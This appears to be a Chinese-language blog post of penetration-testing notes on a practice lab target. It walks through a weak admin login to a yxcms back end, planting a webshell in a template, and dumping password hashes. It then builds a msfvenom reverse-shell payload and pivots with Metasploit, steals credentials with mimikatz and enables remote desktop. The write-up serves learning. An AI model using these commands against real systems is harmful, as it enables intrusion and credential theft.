<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  
  <title>靶机看答案渗透记录-1 | Hexo</title>

  <!-- keywords -->
  

  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta name="description" content="nmap扫不到，但是可以ping通&#x3D; &#x3D; 打开主页之后是phpstudy探针，按照官方文档关闭 然后访问，是个目录遍历漏洞&#x3D; &#x3D; 经过配置进入了主页 找到后台发现系统是yxcms的，询问雪殇知道可以下载yxcms的源码审计，然后发现后台入口 尝试弱密码admin&#x2F;123456可以登陆 后台操作 有个sql执行可以执行某些操作  修改首页模板，index.php可以添加一句话木马， 使用weevel">
<meta property="og:type" content="article">
<meta property="og:title" content="靶机看答案渗透记录-1">
<meta property="og:url" content="http://example.com/2020/11/24/note/web/pentist-1/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="nmap扫不到，但是可以ping通&#x3D; &#x3D; 打开主页之后是phpstudy探针，按照官方文档关闭 然后访问，是个目录遍历漏洞&#x3D; &#x3D; 经过配置进入了主页 找到后台发现系统是yxcms的，询问雪殇知道可以下载yxcms的源码审计，然后发现后台入口 尝试弱密码admin&#x2F;123456可以登陆 后台操作 有个sql执行可以执行某些操作  修改首页模板，index.php可以添加一句话木马， 使用weevel">
<meta property="og:locale" content="en_US">
<meta property="article:published_time" content="2020-11-24T08:42:52.000Z">
<meta property="article:modified_time" content="2020-12-05T10:23:46.642Z">
<meta property="article:author" content="John Doe">
<meta name="twitter:card" content="summary">
  
    <link rel="alternative" href="/atom.xml" title="Hexo" type="application/atom+xml">
  
  
    <link rel="icon" href="http://7xkj1z.com1.z0.glb.clouddn.com/head.jpg">
  
  
<link rel="stylesheet" href="/css/style.css">

  
  

  
<script src="//cdn.bootcss.com/require.js/2.3.2/require.min.js"></script>

  
<script src="//cdn.bootcss.com/jquery/3.1.1/jquery.min.js"></script>


  
<meta name="generator" content="Hexo 5.2.0"></head>
<body>
  <div id="container">
    <div id="particles-js"></div>
    <div class="left-col">
    <div class="overlay"></div>
<div class="intrude-less">
	<header id="header" class="inner">
		<a href="/" class="profilepic">
			
			<img lazy-src="http://7xkj1z.com1.z0.glb.clouddn.com/head.jpg" class="js-avatar">
			
		</a>

		<hgroup>
		  <h1 class="header-author"><a href="/"></a></h1>
		</hgroup>

		

		
			<div class="switch-btn">
				<div class="icon">
					<div class="icon-ctn">
						<div class="icon-wrap icon-house" data-idx="0">
							<div class="birdhouse"></div>
							<div class="birdhouse_holes"></div>
						</div>
						<div class="icon-wrap icon-ribbon hide" data-idx="1">
							<div class="ribbon"></div>
						</div>
						
						<div class="icon-wrap icon-link hide" data-idx="2">
							<div class="loopback_l"></div>
							<div class="loopback_r"></div>
						</div>
						
						
					</div>
					
				</div>
				<div class="tips-box hide">
					<div class="tips-arrow"></div>
					<ul class="tips-inner">
						<li>菜单</li>
						<li>标签</li>
						
						<li>友情链接</li>
						
						
					</ul>
				</div>
			</div>
		

		<div class="switch-area">
			<div class="switch-wrap">
				<section class="switch-part switch-part1">
					<nav class="header-menu">
						<ul>
						
							<li><a href="/">主页</a></li>
				        
							<li><a href="/archives">所有文章</a></li>
				        
						</ul>
					</nav>
					<nav class="header-nav">
						<div class="social">
							
						</div>
					</nav>
				</section>
				
				
				<section class="switch-part switch-part2">
					<div class="widget tagcloud" id="js-tagcloud">
						
					</div>
				</section>
				
				
				
				<section class="switch-part switch-part3">
					<div id="js-friends">
					
			          <a target="_blank" class="main-nav-link switch-friends-link" href="https://github.com/smackgg/hexo-theme-smackdown">smackdown</a>
			        
			        </div>
				</section>
				

				
			</div>
		</div>
	</header>				
</div>
    </div>
    <div class="mid-col">
      <nav id="mobile-nav">
  	<div class="overlay">
  		<div class="slider-trigger"></div>
  		<h1 class="header-author js-mobile-header hide"></h1>
  	</div>
	<div class="intrude-less">
		<header id="header" class="inner">
			<div class="profilepic">
				<img lazy-src="http://7xkj1z.com1.z0.glb.clouddn.com/head.jpg" class="js-avatar">
			</div>
			<hgroup>
			  <h1 class="header-author"></h1>
			</hgroup>
			
			<nav class="header-menu">
				<ul>
				
					<li><a href="/">主页</a></li>
		        
					<li><a href="/archives">所有文章</a></li>
		        
		        <div class="clearfix"></div>
				</ul>
			</nav>
			<nav class="header-nav">
				<div class="social">
					
				</div>
			</nav>
		</header>				
	</div>
</nav>
      <div class="body-wrap"><article id="post-note/web/pentist-1" class="article article-type-post" itemscope itemprop="blogPost">
  
    <div class="article-meta">
      <a href="/2020/11/24/note/web/pentist-1/" class="article-date">
  	<time datetime="2020-11-24T08:42:52.000Z" itemprop="datePublished">2020-11-24</time>
</a>
    </div>
  
  <div class="article-inner">
    
      <input type="hidden" class="isFancy" />
    
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      靶机看答案渗透记录-1
      
    </h1>
  

      </header>
      
      <div class="article-info article-info-post">
        
        

        
        <div class="clearfix"></div>
      </div>
      
    
    <div class="article-entry" itemprop="articleBody">
      
        <p>nmap扫不到，但是可以ping通= =</p>
<p>打开主页之后是phpstudy探针，按照官方文档关闭</p>
<p>然后访问，是个目录遍历漏洞= =</p>
<p>经过配置进入了主页</p>
<h2 id="找到后台"><a href="#找到后台" class="headerlink" title="找到后台"></a>找到后台</h2><p>发现系统是yxcms的，询问雪殇知道可以下载yxcms的源码审计，然后发现后台入口</p>
<p>尝试弱密码admin/123456可以登陆</p>
<h2 id="后台操作"><a href="#后台操作" class="headerlink" title="后台操作"></a>后台操作</h2><ol>
<li><p>有个sql执行可以执行某些操作</p>
</li>
<li><p>修改首页模板，index.php可以添加一句话木马， 使用weevely访问失败，但是可以使用 <a target="_blank" rel="noopener" href="https://doc.u0u.us/zh-hans/getting_started/get_antsword.html">AntSword</a> 访问</p>
</li>
<li><p>有个gethash的工具可以获取windows上面密码的hash值，但是没下到<br>网上找到一个渗透工具集，好家伙<del>白嫖真爽</del></p>
<p>pwdump也可以获取hash，获取到了hash</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">Administrator:500:NO PASSWORD*********************:31D6CFE0D16AE931B73C59D7E0C089C0:::</span><br><span class="line">Guest:501:NO PASSWORD*********************:NO PASSWORD*********************:::</span><br><span class="line">liukaifeng01:1000:NO PASSWORD*********************:31D6CFE0D16AE931B73C59D7E0C089C0:::</span><br></pre></td></tr></table></figure>
</li>
<li><p>虽然找到了hash值，但是没有找到密码</p>
</li>
<li><p>开启了3306端口，可以尝试连接，但是连接失败，不允许连接</p>
</li>
<li><p>使用msf生成木马</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.117 lport=4444 -f exe -o /root/桌面/hakcer.exe</span><br></pre></td></tr></table></figure>
<p>kali下可以使用msfpc简化</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo msfpc windows reverse eth1 4444</span><br></pre></td></tr></table></figure>
</li>
<li><p>msf使用exploit/multi/handler模块</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">set LPORT 4444</span><br><span class="line">set payload windows&#x2F;meterpreter&#x2F;reverse_tcp</span><br><span class="line">run</span><br></pre></td></tr></table></figure>
<p>上传生成的木马到靶机，执行，连接成功，执行sysinfo命令测试是否成功</p>
</li>
<li><p>run vnc进行桌面监控</p>
</li>
<li><p>run autoroute -s 192.168.52.1/24<br> 这条命令允许攻击机进入192.168.52.1/24子网</p>
</li>
<li><p>arp -a查看域控成员</p>
</li>
<li><p>使用background把当前session保存至后台</p>
</li>
<li><p>扫描远端IP</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">use auxiliary&#x2F;scanner&#x2F;portscan&#x2F;tcp</span><br><span class="line">set RHOSTS 192.168.52.141</span><br><span class="line">run</span><br></pre></td></tr></table></figure>
</li>
<li><p>开放了445端口，ms17_010漏洞，大佬说蓝屏，还没试</p>
</li>
<li><p>ms08_067攻击失败</p>
</li>
<li><p>再次连接win7，使用load mimikatz获得凭证</p>
</li>
<li><p>getsystem命令 sysinfo命令 ps命令</p>
</li>
<li><p>migrate命令，explorer为2872</p>
</li>
<li><p>之前load了mimikatz(kiwi)插件，然后执行creds_tspkg获取域控密码，新版本msf变了，遇事不决help</p>
</li>
<li><p>使用run post/windows/manage/enable_rdp开启windows的rdp远程桌面</p>
</li>
<li><p>linux使用rdesktop连接，windows直接使用远程桌面连接<br>用户名和密码为Administrator/hongrisec@2019</p>
</li>
</ol>
<h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h2><ol>
<li>知道系统相关信息之后可以下载相关源码进行审计发现漏洞。从而找到管理登陆页面，弱密码等</li>
<li>pwdump可以获取windows的密码哈希值</li>
<li>msfvenom可以生成木马，msfpc简化生成操作，木马连接到exploit/multi/handler</li>
<li>run vnc用于监控桌面，远程桌面等</li>
<li>run autoroute -s 192.168.52.1/24，这条命令允许攻击机进入192.168.52.1/24子网</li>
<li>msf background把当前session保存至后台，sessions -l 列出所有session，sessions num切换至第num个session</li>
<li>使用auxiliary/scanner/portscan/tcp扫描对应网段的主机</li>
<li>mimikatz插件用于获取登陆凭证，插件已经被替换为kiwi，使用help获取相关用法</li>
<li>使用run post/windows/manage/enable_rdp开启远程桌面</li>
<li>Linux使用rdesktop,windows使用远程桌面连接远程桌面</li>
<li>migrate命令进程迁移，让进程成为目标机器某个合法进程的子进程，比如说explorer.exe</li>
</ol>
<h2 id="两个漏洞"><a href="#两个漏洞" class="headerlink" title="两个漏洞"></a>两个漏洞</h2><ol>
<li>msf17_010</li>
<li>msf08_067<br>都使用了445端口<br>MS08-067漏洞原理分析及还原 - 乃逸夫的文章 - 知乎<br><a target="_blank" rel="noopener" href="https://zhuanlan.zhihu.com/p/27155431">https://zhuanlan.zhihu.com/p/27155431</a></li>
</ol>

      
    </div>
    
  </div>
  
    
<nav id="article-nav">
  
    <a href="/2020/11/26/note/rev/qiling/" id="article-nav-newer" class="article-nav-link-wrap">
      <strong class="article-nav-caption">&lt;</strong>
      <div class="article-nav-title">
        
          麒麟框架使用--官方示例
        
      </div>
    </a>
  
  
    <a href="/2020/11/20/writeup/kctf2020-10/wp/" id="article-nav-older" class="article-nav-link-wrap">
      <div class="article-nav-title">kctf2020部分wp</div>
      <strong class="article-nav-caption">&gt;</strong>
    </a>
  
</nav>

  
</article>


<div class="ds-share share" data-thread-key="note/web/pentist-1" data-title="靶机看答案渗透记录-1" data-url="http://example.com/2020/11/24/note/web/pentist-1/"  data-images="http://7xkj1z.com1.z0.glb.clouddn.com/head.jpg" data-content="靶机看答案渗透记录-1">
    <div class="ds-share-inline">
      <ul  class="ds-share-icons-16">
      	<li data-toggle="ds-share-icons-more"><a class="ds-more" href="javascript:void(0);">分享到：</a></li>
        <li><a class="ds-weibo" href="javascript:void(0);" data-service="weibo">微博</a></li>
        <li><a class="ds-qzone" href="javascript:void(0);" data-service="qzone">QQ空间</a></li>
        <li><a class="ds-qqt" href="javascript:void(0);" data-service="qqt">腾讯微博</a></li>
        <li><a class="ds-wechat" href="javascript:void(0);" data-service="wechat">微信</a></li>
      </ul>
      <div class="ds-share-icons-more">
      </div>
    </div>
 </div>
 





</div>
      <footer id="footer">
  <div class="outer">
    <div id="footer-info">
      <div class="footer-left">
        &copy; 2020 John Doe
      </div>
        <div class="footer-right">
          <a href="http://hexo.io/" target="_blank">Hexo</a>  Theme <a href="https://github.com/smackgg/hexo-theme-smackdown" target="_blank">Smackdown</a>
        </div>
    </div>
  </div>
</footer>
    </div>
    
  
<link rel="stylesheet" href="/fancybox/jquery.fancybox.css">



<script>
	var yiliaConfig = {
		fancybox: true,
		mathjax: true,
		animate: true,
		isHome: false,
		isPost: true,
		isArchive: false,
		isTag: false,
		isCategory: false,
		open_in_new: false
	}
</script>

<script src="/js/main.js"></script>




<script type="text/x-mathjax-config">
MathJax.Hub.Config({
    tex2jax: {
        inlineMath: [ ['$','$'], ["\\(","\\)"]  ],
        processEscapes: true,
        skipTags: ['script', 'noscript', 'style', 'textarea', 'pre', 'code']
    }
});

MathJax.Hub.Queue(function() {
    var all = MathJax.Hub.getAllJax(), i;
    for(i=0; i < all.length; i += 1) {
        all[i].SourceElement().parentNode.className += ' has-jax';                 
    }       
});
</script>

<script src="//cdn.bootcss.com/mathjax/2.7.0/MathJax.js"></script>


  </div>
</body>
</html>